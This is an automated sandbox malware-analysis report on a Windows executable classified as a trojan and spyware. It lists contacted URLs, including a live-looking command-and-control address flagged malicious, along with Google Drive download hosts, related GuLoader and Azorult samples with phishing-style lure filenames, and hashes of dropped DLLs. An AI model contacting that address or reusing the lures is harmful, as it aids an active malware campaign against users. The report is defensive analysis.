                  https://login.live.c0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.phptVersion0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.phprol-Al0%Avira URL Cloudsafe
                  http://89.40.31.232/0%Avira URL Cloudsafe
                  https://www.google.com0%Avira URL Cloudsafe
                  https://drive.google.com/0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.php$0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.phpK0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.phpquest-context0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  drive.google.com
                  		142.250.185.238
                  		truefalse
                    		unknown
                    drive.usercontent.google.com
                    		142.250.185.97
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://89.40.31.232/12/index.phptrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://89.40.31.232/12/index.php6No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabNo. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://89.40.31.232/12/index.phpwNo. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mozilla.com/en-US/blocklist/No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoNo. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://89.40.31.232/12/index.phpdeNo. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://89.40.31.232/12/index.phpept-RaNo. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/svNo. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ocsp.thawte.com0No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.mozilla.com0No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://login.live.cNo. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://drive.usercontent.google.com/No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorNo. 1349240400713.exe, 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmp, No. 1349240400713.exe, 00000000.00000000.1245208381.000000000040A000.00000008.00000001.01000000.00000003.sdmp, No. 1349240400713.exe, 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://89.40.31.232/12/index.phptVersionNo. 1349240400713.exe, 00000009.00000002.1886652330.0000000006921000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://89.40.31.232/No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://89.40.31.232/12/index.phprol-AlNo. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.comNo. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.thawte.com/ThawteTimestampingCA.crl0No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://drive.google.com/No. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNo. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://89.40.31.232/12/index.php$No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://apis.google.comNo. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://89.40.31.232/12/index.phpKNo. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://89.40.31.232/12/index.phpquest-contextNo. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      89.40.31.232
                      		unknownRomania
                      		35512TELEMEDIA-ASROtrue
                      142.250.185.238
                      		drive.google.comUnited States
                      		15169GOOGLEUSfalse
                      142.250.185.97
                      		drive.usercontent.google.comUnited States
                      		15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1548261
                      Start date and time:2024-11-04 09:26:04 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 18s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:No. 1349240400713.exe
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.evad.winEXE@3/60@2/3
                      EGA Information:
                      • Successful, ratio: 50%
                      HCA Information:
                      • Successful, ratio: 89%
                      • Number of executed functions: 48
                      • Number of non-executed functions: 64
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target No. 1349240400713.exe, PID 1916 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: No. 1349240400713.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      37f463bf4616ecd445d4a1937da06e19kWcgTHdqyB.exeGet hashmaliciousStealc, VidarBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      EE85716273#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                      • 142.250.185.238
                      • 142.250.185.97
                      SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                      • 142.250.185.238
                      • 142.250.185.97

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dllPRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                        Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                          Order160311_Reference.htaGet hashmaliciousAzorultBrowse
                            Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                              Order-63729_Reference.batGet hashmaliciousAzorultBrowse
                                Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                  Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                    HSBC_Payment.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                      Est_US091024A - PICTURE.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                        SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dllPRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                              Order160311_Reference.htaGet hashmaliciousAzorultBrowse
                                                Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                                  Order-63729_Reference.batGet hashmaliciousAzorultBrowse
                                                    Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                                      Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                        HSBC_Payment.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                          Est_US091024A - PICTURE.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                            SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.080160932980843
                                                              Encrypted:false
                                                              SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                              MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                              SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                              SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                              SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious, Browse
                                                              • Filename: Payment.cmd, Detection: malicious, Browse
                                                              • Filename: Order160311_Reference.hta, Detection: malicious, Browse
                                                              • Filename: Refrence-Order#63729.pdf, Detection: malicious, Browse
                                                              • Filename: Order-63729_Reference.bat, Detection: malicious, Browse
                                                              • Filename: Refrence-Order#63729.pdf, Detection: malicious, Browse
                                                              • Filename: Payment Advice Note_Pdf.exe, Detection: malicious, Browse
                                                              • Filename: HSBC_Payment.exe, Detection: malicious, Browse
                                                              • Filename: Est_US091024A - PICTURE.exe, Detection: malicious, Browse
                                                              • Filename: SwiftMesaj.pdf.exe, Detection: malicious, Browse
                                                              Reputation:high, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.093995452106596
                                                              Encrypted:false
                                                              SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                              MD5:CB978304B79EF53962408C611DFB20F5
                                                              SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                              SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                              SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious, Browse
                                                              • Filename: Payment.cmd, Detection: malicious, Browse
                                                              • Filename: Order160311_Reference.hta, Detection: malicious, Browse
                                                              • Filename: Refrence-Order#63729.pdf, Detection: malicious, Browse
                                                              • Filename: Order-63729_Reference.bat, Detection: malicious, Browse
                                                              • Filename: Refrence-Order#63729.pdf, Detection: malicious, Browse
                                                              • Filename: Payment Advice Note_Pdf.exe, Detection: malicious, Browse
                                                              • Filename: HSBC_Payment.exe, Detection: malicious, Browse
                                                              • Filename: Est_US091024A - PICTURE.exe, Detection: malicious, Browse
                                                              • Filename: SwiftMesaj.pdf.exe, Detection: malicious, Browse
                                                              Reputation:high, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.1028816880814265
                                                              Encrypted:false
                                                              SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                              MD5:88FF191FD8648099592ED28EE6C442A5
                                                              SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                              SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                              SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:high, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.126358371711227
                                                              Encrypted:false
                                                              SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                              MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                              SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                              SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                              SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:high, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):21816
                                                              Entropy (8bit):7.014255619395433
                                                              Encrypted:false
                                                              SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                              MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                              SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                              SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                              SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:high, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.112057846012794
                                                              Encrypted:false
                                                              SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                              MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                              SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                              SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                              SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.166618249693435
                                                              Encrypted:false
                                                              SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                              MD5:E479444BDD4AE4577FD32314A68F5D28
                                                              SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                              SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                              SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.1117101479630005
                                                              Encrypted:false
                                                              SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                              MD5:6DB54065B33861967B491DD1C8FD8595
                                                              SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
